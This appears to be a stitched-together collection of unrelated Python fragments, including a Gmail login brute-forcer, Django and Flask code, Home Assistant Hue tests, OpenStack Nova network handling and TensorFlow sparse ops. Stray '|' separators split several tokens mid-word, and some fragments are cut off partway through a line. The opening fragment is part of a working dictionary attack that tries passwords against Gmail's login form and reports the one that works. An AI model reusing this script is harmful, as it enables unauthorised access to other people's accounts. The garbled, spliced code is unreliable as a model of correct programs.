fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
|
#Aditya Joshi
#Enumerating Oriented Gene Ordering
from itertools import permutations,product
from math import fabs
n = int(raw_input())
def make_set(n):
set = []
for x in range(1,n+1):
set += [x]
return set
def plusAndMinusPermut | ations(items):
for p in permutations(items,len(items)):
for signs in product([-1,1], repeat=len(items)) | :
yield [a*sign for a,sign in zip(p,signs)]
def array_to_string(list):
string = ""
string += str(list[0]) + " " + str(list[1])
return string
count = 0
for x in plusAndMinusPermutations(make_set(n)):
print array_to_string(x)
count += 1
print count
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# | Michael A.G. Aivazis
# California Institute of | Technology
# (C) 1998-2005 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from SI import meter, second
gal = 0.01*meter/second**2
# version
__id__ = "$Id: force.py,v 1.1.1.1 2005/03/08 16:13:41 aivazis Exp $"
#
# End of file
|
from .base import *
import dj_database_url
if os.environ.get('DEBUG') == 'False':
DEBUG = False
else:
DEBUG = True
try:
from .local import *
except ImportError:
pass
ALLOWED_HOSTS = ['*']
DATABASES = {'default': dj_database_url.config()}
SOCIAL_AUTH_YAMMER_KEY = os.environ.get('SOCIAL_AUTH_YAMMER_KEY')
SOCIAL_AUTH_YAMMER_SECRET = os.environ.get('SOCIAL_AUTH_YAMMER_SECRET')
AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']
S | TATICFILES_STORAGE = 'core.storage.S3PipelineManifestStorage'
STATIC_URL = 'http://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
AWS_QUERYSTRING_AUTH = False
AWS_S3_FILE_OVERWRITE = True
PIPELINE_JS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_CSS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_YUGLIFY_BINARY = '/app/.heroku/python/bin/yug | lify' |
import datetime
import logging
from functools import reduce
from flask_babelpkg import lazy_gettext
from .filters import Filters
log = logging.getLogger(__name__)
class BaseInterface(object):
"""
Base class for all data model interfaces.
Sub class it to implement your own interface for some data engine.
"""
obj = None
filter_converter_class = None
""" when sub classing override with your own custom filter converter """
""" Messages to display on CRUD Events """
add_row_message = lazy_gettext('Added Row')
edit_row_message = lazy_gettext('Changed Row')
delete_row_message = lazy_gettext('Deleted Row')
delete_integrity_error_message = lazy_gettext('Associated data exists, please delete them first')
add_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
edit_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
general_error_message = lazy_gettext('General Error')
""" Tuple with message and text with severity type ex: ("Added Row", "info") """
message = ()
def __init__(self, obj):
self.obj = obj
def _get_attr_value(self, item, col):
if not hasattr(item, col):
# it's an inner obj attr
return reduce(getattr, col.split('.'), item)
if hasattr(getattr(item, col), '__call__'):
# its a function
return getattr(item, col)()
else:
# its attribute
return getattr(item, col)
def get_filters(self, search_columns=None):
search_columns = search_columns or []
return Filters(self.filter_converter_class, self, search_columns)
def get_values_item(self, item, show_columns):
return [self._get_attr_value(item, col) for col in show_columns]
def _get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
The list of columns to include
"""
retlst = []
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
retlst.append(retdict)
return retlst
def get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
| The list of columns to include
"""
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
yield retdict
def get_values_json(self, lst, list_columns):
"""
Converts list of | objects from query to JSON
"""
result = []
for item in self.get_values(lst, list_columns):
for key, value in list(item.items()):
if isinstance(value, datetime.datetime) or isinstance(value, datetime.date):
value = value.isoformat()
item[key] = value
if isinstance(value, list):
item[key] = [str(v) for v in value]
result.append(item)
return result
"""
Returns the models class name
useful for auto title on views
"""
@property
def model_name(self):
return self.obj.__class__.__name__
"""
Next methods must be overridden
"""
def query(self, filters=None, order_column='', order_direction='',
page=None, page_size=None):
pass
def is_image(self, col_name):
return False
def is_file(self, col_name):
return False
def is_gridfs_file(self, col_name):
return False
def is_gridfs_image(self, col_name):
return False
def is_string(self, col_name):
return False
def is_text(self, col_name):
return False
def is_integer(self, col_name):
return False
def is_float(self, col_name):
return False
def is_boolean(self, col_name):
return False
def is_date(self, col_name):
return False
def is_datetime(self, col_name):
return False
def is_relation(self, prop):
return False
def is_relation_col(self, col):
return False
def is_relation_many_to_one(self, prop):
return False
def is_relation_many_to_many(self, prop):
return False
def is_relation_one_to_one(self, prop):
return False
def is_relation_one_to_many(self, prop):
return False
def is_nullable(self, col_name):
return True
def is_unique(self, col_name):
return False
def is_pk(self, col_name):
return False
def is_fk(self, col_name):
return False
def get_max_length(self, col_name):
return -1
def get_min_length(self, col_name):
return -1
"""
-----------------------------------------
FUNCTIONS FOR CRUD OPERATIONS
-----------------------------------------
"""
def add(self, item):
"""
Adds object
"""
raise NotImplementedError
def edit(self, item):
"""
Edit (change) object
"""
raise NotImplementedError
def delete(self, item):
"""
Deletes object
"""
raise NotImplementedError
def get_col_default(self, col_name):
pass
def get_keys(self, lst):
"""
return a list of pk values from object list
"""
pk_name = self.get_pk_name()
return [getattr(item, pk_name) for item in lst]
def get_pk_name(self, item):
"""
Returns the primary key name
"""
raise NotImplementedError
def get_pk_value(self, item):
return getattr(item, self.get_pk_name())
def get(self, pk):
"""
return the record from key
"""
pass
def get_related_model(self, prop):
raise NotImplementedError
def get_related_interface(self, col_name):
"""
Returns a BaseInterface for the related model
of column name.
:param col_name: Column name with relation
:return: BaseInterface
"""
raise NotImplementedError
def get_related_obj(self, col_name, value):
raise NotImplementedError
def get_related_fk(self, model):
raise NotImplementedError
def get_columns_list(self):
"""
Returns a list of all the columns names
"""
return []
def get_user_columns_list(self):
"""
Returns a list of user viewable columns names
"""
return self.get_columns_list()
def get_search_columns_list(self):
"""
Returns a list of searchable columns names
"""
return []
def get_order_columns_list(self, list_columns=None):
"""
Returns a list of order columns names
"""
return []
def get_relation_fk(self, prop):
pass
|
"""
@file sumoConfigGen.py
@author Craig Rafter
@date 29/01/2016
Code to generate a config file for a SUMO model.
"""
def sumoConfigGen(modelname='simpleT', configFile='./models/simpleT.sumocfg',
exportPath='../', AVratio=0, stepSize=0.01,
run=0, port=8813):
configXML = open(configFile, 'w')
print >> configXML, """<configuration>
<input>
<net-file value="{model}.net.xml"/>
<route-files value="{model}.rou.xml"/>
<gui-settings-file value="gui-settings.cfg"/>
<game value="1"/>
<start value="1"/>
<!--additional-files value="{model}.det.xml"/-->
</input>
<output>
<!--<summary-output value="{expPath}summary{AVR:03d}_{Nrun:03d}.xml"/>-->
<!--tripinfo-output value="{expPath}tripinfo{AVR:03d}_{Nrun:03d}.xml"/-->
<!--<vehroute-output value="{expPath}vehroute{AVR:03d}_{Nrun:03d}.xml"/-->
<!--queue-output value="{expPath}queuedata{AVR:03d}_{Nrun:03d}.xml"/-->
</output>
<time>
<begin value="0"/>
<step-length value="{stepSz}"/>
</time>
<processing>
<!--TURN OFF TELEPORTING-->
<time-to-teleport value="-1 | "/>
</processing>
<report>
<no-step-log value="true"/>
<error-log value="logfile.txt"/>
</report>
<traci_server>
<remote-port value="{SUMOport}"/>
</traci_server>""".format(model=modelname, expPath=exportPath,
AVR=int(AVratio*100), stepSz=stepSize,
| Nrun=run, SUMOport=port)
print >> configXML, "</configuration>"
configXML.close()
|
from __future__ import absolute_import
from base64 import b64encode
from ..packages.six import b
ACCEPT_ENCODING = 'gzip,deflate'
def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
basic_auth=None, proxy_basic_auth=None, disable_cache=None):
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example::
>>> make_headers(keep_alive=True, user_agent="Batman/1.0")
{'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
>>> make_headers(accept_encoding=True)
{'accept-encoding': 'gzip,deflate'}
"""
headers = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ','.join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers['accept-encoding'] = accept_encoding
if user_agent:
headers['user-agent'] = user_agent
if keep_alive:
headers['connection'] = 'keep-alive'
if basic_auth:
headers['authorization'] = 'Basic ' + \
| b64encode(b(basic_auth)).decode('utf-8')
if proxy_basic_auth:
| headers['proxy-authorization'] = 'Basic ' + \
b64encode(b(proxy_basic_auth)).decode('utf-8')
if disable_cache:
headers['cache-control'] = 'no-cache'
return headers
|
'''
Problem 2
@author: Kevin Ji
'''
def sum_even_fibonacci( max_value ):
# Initial two elements
prev_term = 1
cur_term = 2
temp_sum = 2
| while cur_term < max_value:
next_term = prev_term + cur_term
prev_term = cur_term
cur_term = next_term
if cur_term % 2 == 0:
temp_sum += cur_term
return temp_sum
print( sum_even_ | fibonacci( 4000000 ) )
|
mport pytest
from homeassistant import config_entries
from homeassistant.components import hue
from homeassistant.setup import async_setup_component
from tests.async_mock import AsyncMock, patch
from tests.common import MockConfigEntry
@pytest.fixture
def mock_bridge_setup():
"""Mock bridge setup."""
with patch.object(hue, "HueBridge") as mock_bridge:
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(bridgeid="mock-id")
yield mock_bridge.return_value
async def test_setup_with_no_config(hass):
"""Test that we do not discover anything or try to set up a bridge."""
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
# No flows started
assert len(hass.config_entries.flow.async_progress()) == 0
# No configs stored
assert hass.data[hue.DOMAIN] == {}
async def test_setup_defined_hosts_known_auth(hass):
"""Test we don't initiate a config entry if config bridge is known."""
MockConfigEntry(domain="hue", data={"host": "0.0.0.0"}).add_to_hass(hass)
with patch.object(hue, "async_setup_entry", return_value=True):
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: [
{
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
{hue.CONF_HOST: "1.1.1.1"},
]
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
"1.1.1.1": {hue.CONF_HOST: "1.1.1.1"},
}
async def test_setup_defined_hosts_no_known_auth(hass):
"""Test we initiate config entry if config bridge is not known."""
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
async def test_config_passed_to_config_entry(hass):
"""Test that configured options for a host are loaded via config entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
mock_registry = Mock()
with patch.object(hue, "HueBridge") as mock_bridge, patch(
"homeassistant.helpers.device_registry.async_get_registry",
return_value=mock_registry,
):
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(
mac="mock-mac",
bridgeid="mock-bridgeid",
modelid="mock-modelid",
swversion="mock-swversion",
)
# Can't set name via kwargs
mock_bridge.return_value.api.config.name = "mock-name"
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
assert len(mock_bridge.mock_calls) == 2
p_hass, p_entry = mock_bridge.mock_calls[0][1]
assert p_hass is hass
assert p_entry is entry
assert len(mock_registry.mock_calls) == 1
assert mock_registry.mock_calls[0][2] == {
"config_entry_id": entry.entry_id,
"connections": {("mac", "mock-mac")},
"identifiers": {("hue", "mock-bridgeid")},
"manufacturer": "Signify",
"name": "mock-name",
"model": "mock-modelid",
"sw_version": "mock-swversion",
}
async def test_unload_entry(hass, mock_bridge_setup):
"""Test being able to unload an entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert aw | ait async_setup_component(hass, hue.DOMAIN, {}) is True
assert len(mock_bridge_setup.mock_calls) == 1
mock_bridge_setup.async_reset = AsyncMock(return_value=True)
assert await hue.async_unload_entry(hass, entry)
assert len(mock_bridge_setup.async_reset.mock_calls) == 1
assert hass.data[hue.DOMAIN] == {}
async def test_setting_unique_id(hass, mock_bridge_setup):
"""Test we set unique ID if not s | et yet."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_no_other(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id"
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_other_ignored(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
MockConfigEntry(
domain=hue.DOMAIN,
data={"host": "0.0.0.0"},
unique_id="mock-id",
source=config_entries.SOURCE_IGNORE,
).add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert entry.unique_id == "mock-id"
assert hass.config_entries.async_entries() == [entry]
async def test_fixing_unique_id_other_correct(hass, mock_bridge_setup):
"""Test we remove config entry if another one has correct ID."""
correct_entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="mock-id",
)
correct_entry.add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert hass.config_entries.async_entries() == [correct_entry]
async def test_security_vuln_check(hass):
"""Test that we report security vulnerabilities."""
assert await async_setup_component(hass, "persistent_notification", {})
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
config = Mock(bridgeid="", mac="", modelid="BSB002", swversion="1935144020")
config.name = "Hue"
with patch.object(
hue,
"HueBridge",
Mock(
return_value=Mock(
async_setup=AsyncMock(return_value=True), api=Mock(config=config)
)
),
):
assert await async_setup_component(hass, "hue", {})
await hass.async_block_till_done()
state = hass.states.get("persistent_notification.hue_hub_fi |
from django.views.generic.detail import DetailView
from django.shortcuts import render, redirect
from django.http import Htt | p404
from aspc.folio.models import Page
class AttachedPageMixin(object):
def get_page(self):
try:
return Page.objects.get(slug=self.page_slug)
except Page.DoesNotExist:
return None
def get_context_data(self, **kwargs):
context = super(AttachedPageMixin, self).get_context_data(**kwargs)
context['page'] = self.get_page()
return context
def page_view(request, slu | g_path):
'''slug_path: ^(?P<slug_path>(?:[\w\-\d]+/)+)$ '''
slug_parts = slug_path.rstrip('/').split('/')
pages = Page.objects.exclude(managed=True)
for part in slug_parts:
try:
new_page = pages.get(slug=part)
except Page.DoesNotExist:
raise Http404
else:
pages = new_page.page_set.all()
return render(request, "folio/page.html", {
"title": new_page.title,
"body": new_page.body,
"page": new_page,
"active_section": new_page.path()[0].slug,
})
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import netaddr.core as netexc
from oslo.config import cfg
import six
from webob import exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
import nova.network
from nova.openstack.common import log as logging
from nova import quota
CONF = cfg.CONF
CONF.import_opt('enable_network_quota',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('use_neutron_default_nets',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('neutron_default_tenant_id',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('quota_networks',
'nova.api.openstack.compute.contrib.os_tenant_networks')
ALIAS = 'os-tenant-networks'
QUOTAS = quota.QUOTAS
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def network_dict(network):
# NOTE(danms): Here, network should be an object, which could have come
# from neutron and thus be missing most of the attributes. Providing a
# default to get() avoids trying to lazy-load missing attributes.
return {"id": network.get("uuid", None) or network.get("id", None),
"cidr": str(network.get("cidr", None)),
"label": network.get("label", None)}
class TenantNetworkController(wsgi.Controller):
def __init__(self, network_api=None):
self.network_api = nova.network.API()
self._default_networks = []
def _refresh_default_networks(self):
self._default_networks = []
if CONF.use_neutron_default_nets == "True":
try:
self._default_networks = self._get_default_networks()
except Exception:
LOG.exception(_LE("Failed to get default networks"))
def _get_default_networks(self):
project_id = | CONF.neutron_default_tenant_id
ctx = nova_context.RequestContext(user_id=None,
project_id=project_id)
networks = {}
for n in self.network_api.get_all(ctx):
networks[n['id']] = n['label']
return [{'id': k, 'label': v} for k, v | in networks.iteritems()]
@extensions.expected_errors(())
def index(self, req):
context = req.environ['nova.context']
authorize(context)
networks = list(self.network_api.get_all(context))
if not self._default_networks:
self._refresh_default_networks()
networks.extend(self._default_networks)
return {'networks': [network_dict(n) for n in networks]}
@extensions.expected_errors(404)
def show(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
network = self.network_api.get(context, id)
except exception.NetworkNotFound:
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
return {'network': network_dict(network)}
@extensions.expected_errors((403, 404, 409))
@wsgi.response(202)
def delete(self, req, id):
context = req.environ['nova.context']
authorize(context)
reservation = None
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=-1)
except Exception:
reservation = None
LOG.exception(_LE("Failed to update usages deallocating "
"network."))
def _rollback_quota(reservation):
if CONF.enable_network_quota and reservation:
QUOTAS.rollback(context, reservation)
try:
self.network_api.delete(context, id)
except exception.PolicyNotAuthorized as e:
_rollback_quota(reservation)
raise exc.HTTPForbidden(explanation=six.text_type(e))
except exception.NetworkInUse as e:
_rollback_quota(reservation)
raise exc.HTTPConflict(explanation=e.format_message())
except exception.NetworkNotFound:
_rollback_quota(reservation)
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
if CONF.enable_network_quota and reservation:
QUOTAS.commit(context, reservation)
@extensions.expected_errors((400, 403, 503))
def create(self, req, body):
if not body:
_msg = _("Missing request body")
raise exc.HTTPBadRequest(explanation=_msg)
context = req.environ["nova.context"]
authorize(context)
network = body["network"]
keys = ["cidr", "cidr_v6", "ipam", "vlan_start", "network_size",
"num_networks"]
kwargs = {k: network.get(k) for k in keys}
label = network["label"]
if not (kwargs["cidr"] or kwargs["cidr_v6"]):
msg = _("No CIDR requested")
raise exc.HTTPBadRequest(explanation=msg)
if kwargs["cidr"]:
try:
net = netaddr.IPNetwork(kwargs["cidr"])
if net.size < 4:
msg = _("Requested network does not contain "
"enough (2+) usable hosts")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrFormatError:
msg = _("CIDR is malformed.")
raise exc.HTTPBadRequest(explanation=msg)
except netexc.AddrConversionError:
msg = _("Address could not be converted.")
raise exc.HTTPBadRequest(explanation=msg)
networks = []
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=1)
except exception.OverQuota:
msg = _("Quota exceeded, too many networks.")
raise exc.HTTPBadRequest(explanation=msg)
try:
networks = self.network_api.create(context,
label=label, **kwargs)
if CONF.enable_network_quota:
QUOTAS.commit(context, reservation)
except exception.PolicyNotAuthorized as e:
raise exc.HTTPForbidden(explanation=six.text_type(e))
except Exception:
if CONF.enable_network_quota:
QUOTAS.rollback(context, reservation)
msg = _("Create networks failed")
LOG.exception(msg, extra=network)
raise exc.HTTPServiceUnavailable(explanation=msg)
return {"network": network_dict(networks[0])}
class TenantNetworks(extensions.V3APIExtensionBase):
"""Tenant-based Network Management Extension."""
name = "TenantNetworks"
alias = ALIAS
version = 1
def get_resources(self):
ext = extensions.ResourceExtension(ALIAS, TenantNetworkController())
return [ext]
def get_controller_extensions(self):
return []
def _sync_networks(context, project_id, session):
ctx = nova_context.RequestContext(user_id=None, project_id=project_id)
ctx = ctx.elevated()
networks = nova.network.api.API().get_all(ctx)
return dict(networks=len(networks))
if CONF.enable_network_quota:
QUOTAS.register_resource(quota.ReservableResource('networks',
_sync_networks,
'quota_networks' |
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Geometry module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=g-im | port-not-at-top
from tensorflow_graphics.util.doc i | mport _import_tfg_docs
if _import_tfg_docs():
from tensorflow_graphics.geometry import convolution
from tensorflow_graphics.geometry import deformation_energy
from tensorflow_graphics.geometry import representation
from tensorflow_graphics.geometry import transformation
from tensorflow_graphics.util import export_api as _export_api
# API contains submodules of tensorflow_graphics.geometry.
__all__ = _export_api.get_modules()
# pylint: enable=g-import-not-at-top
|
#!/bin/python2
# Script that replies to username mentions.
import time
import os
import cPickle
im | port sys
import traceback
import numpy
import sys
from PIL import Image
from urlparse import urlparse
import gabenizer
IMG = "http://i.4cdn.org/r9k/1463377581531.jpg"
def main():
image = gabenizer.process_image(sys.argv[1], './plugins/gabenize | r/gabenface.png')
image.save("./plugins/gabenizer/whatfuck.png")
if __name__ == "__main__":
main()
|
nputs]
shapes = [sp_input.dense_shape for sp_input in sp_inputs]
if expand_nonconcat_dim:
max_shape = math_ops.reduce_max(
array_ops.concat(
[array_ops.reshape(shape, [ | 1, -1]) for shape in shapes], 0), 0)
shapes = [
array_ops.concat([
max_sha | pe[:axis], shape[-1:]
if axis == -1 else shape[axis:axis + 1], []
if axis == -1 else max_shape[axis + 1:]
], 0) for shape in shapes
]
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_concat(inds, vals, shapes, axis, name=name))
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
@tf_export("sparse_add")
def sparse_add(a, b, thresh=0):
"""Adds two tensors, at least one of each is a `SparseTensor`.
If one `SparseTensor` and one `Tensor` are passed in, returns a `Tensor`. If
both arguments are `SparseTensor`s, this returns a `SparseTensor`. The order
of arguments does not matter. Use vanilla `tf.add()` for adding two dense
`Tensor`s.
The shapes of the two operands must match: broadcasting is not supported.
The indices of any input `SparseTensor` are assumed ordered in standard
lexicographic order. If this is not the case, before this step run
`SparseReorder` to restore index ordering.
If both arguments are sparse, we perform "clipping" as follows. By default,
if two values sum to zero at some index, the output `SparseTensor` would still
include that particular location in its index, storing a zero in the
corresponding value slot. To override this, callers can specify `thresh`,
indicating that if the sum has a magnitude strictly smaller than `thresh`, its
corresponding value and index would then not be included. In particular,
`thresh == 0.0` (default) means everything is kept and actual thresholding
happens only for a positive value.
For example, suppose the logical sum of two sparse operands is (densified):
[ 2]
[.1 0]
[ 6 -.2]
Then,
* `thresh == 0` (the default): all 5 index/value pairs will be returned.
* `thresh == 0.11`: only .1 and 0 will vanish, and the remaining three
index/value pairs will be returned.
* `thresh == 0.21`: .1, 0, and -.2 will vanish.
Args:
a: The first operand; `SparseTensor` or `Tensor`.
b: The second operand; `SparseTensor` or `Tensor`. At least one operand
must be sparse.
thresh: A 0-D `Tensor`. The magnitude threshold that determines if an
output value/index pair takes space. Its dtype should match that of the
values if they are real; if the latter are complex64/complex128, then the
dtype should be float32/float64, correspondingly.
Returns:
A `SparseTensor` or a `Tensor`, representing the sum.
Raises:
TypeError: If both `a` and `b` are `Tensor`s. Use `tf.add()` instead.
"""
sparse_classes = (sparse_tensor.SparseTensor, sparse_tensor.SparseTensorValue)
if not any(isinstance(inp, sparse_classes) for inp in [a, b]):
raise TypeError("At least one input should be SparseTensor; do you mean to"
" use tf.add()?")
if all(isinstance(inp, sparse_classes) for inp in [a, b]):
a = _convert_to_sparse_tensor(a)
b = _convert_to_sparse_tensor(b)
thresh = ops.convert_to_tensor(
thresh, dtype=a.values.dtype.real_dtype.base_dtype, name="thresh")
output_ind, output_val, output_shape = (
gen_sparse_ops.sparse_add(a.indices, a.values, a.dense_shape,
b.indices, b.values, b.dense_shape, thresh))
# Attempt to get output_shape statically.
a.get_shape().assert_is_compatible_with(b.get_shape())
static_shape = array_ops.broadcast_static_shape(a.get_shape(),
b.get_shape())
if static_shape.is_fully_defined():
output_shape = static_shape.as_list()
return sparse_tensor.SparseTensor(output_ind, output_val, output_shape)
else:
# swap to make `a` the SparseTensor.
if isinstance(b, sparse_classes):
a, b = b, a
return gen_sparse_ops.sparse_tensor_dense_add(a.indices, a.values,
a.dense_shape, b)
def _sparse_cross(inputs, name=None):
"""Generates sparse cross from a list of sparse and dense tensors.
For example, if the inputs are
* inputs[0]: SparseTensor with shape = [2, 2]
[0, 0]: "a"
[1, 0]: "b"
[1, 1]: "c"
* inputs[1]: SparseTensor with shape = [2, 1]
[0, 0]: "d"
[1, 0]: "e"
* inputs[2]: Tensor [["f"], ["g"]]
then the output will be:
shape = [2, 2]
[0, 0]: "a_X_d_X_f"
[1, 0]: "b_X_e_X_g"
[1, 1]: "c_X_e_X_g"
Args:
inputs: An iterable of `Tensor` or `SparseTensor`.
name: Optional name for the op.
Returns:
A `SparseTensor` of type `string`.
"""
return _sparse_cross_internal(inputs=inputs, hashed_output=False, name=name)
def _sparse_cross_hashed(inputs, num_buckets=0, hash_key=None, name=None):
"""Generates hashed sparse cross from a list of sparse and dense tensors.
For example, if the inputs are
* inputs[0]: SparseTensor with shape = [2, 2]
[0, 0]: "a"
[1, 0]: "b"
[1, 1]: "c"
* inputs[1]: SparseTensor with shape = [2, 1]
[0, 0]: "d"
[1, 0]: "e"
* inputs[2]: Tensor [["f"], ["g"]]
then the output will be:
shape = [2, 2]
[0, 0]: FingerprintCat64(
Fingerprint64("f"), FingerprintCat64(
Fingerprint64("d"), Fingerprint64("a")))
[1, 0]: FingerprintCat64(
Fingerprint64("g"), FingerprintCat64(
Fingerprint64("e"), Fingerprint64("b")))
[1, 1]: FingerprintCat64(
Fingerprint64("g"), FingerprintCat64(
Fingerprint64("e"), Fingerprint64("c")))
Args:
inputs: An iterable of `Tensor` or `SparseTensor`.
num_buckets: An `int` that is `>= 0`.
output = hashed_value%num_buckets if num_buckets > 0 else hashed_value.
hash_key: Integer hash_key that will be used by the `FingerprintCat64`
function. If not given, will use a default key.
name: Optional name for the op.
Returns:
A `SparseTensor` of type `int64`.
"""
return _sparse_cross_internal(
inputs=inputs,
hashed_output=True,
num_buckets=num_buckets,
hash_key=hash_key,
name=name)
_DEFAULT_HASH_KEY = 0xDECAFCAFFE
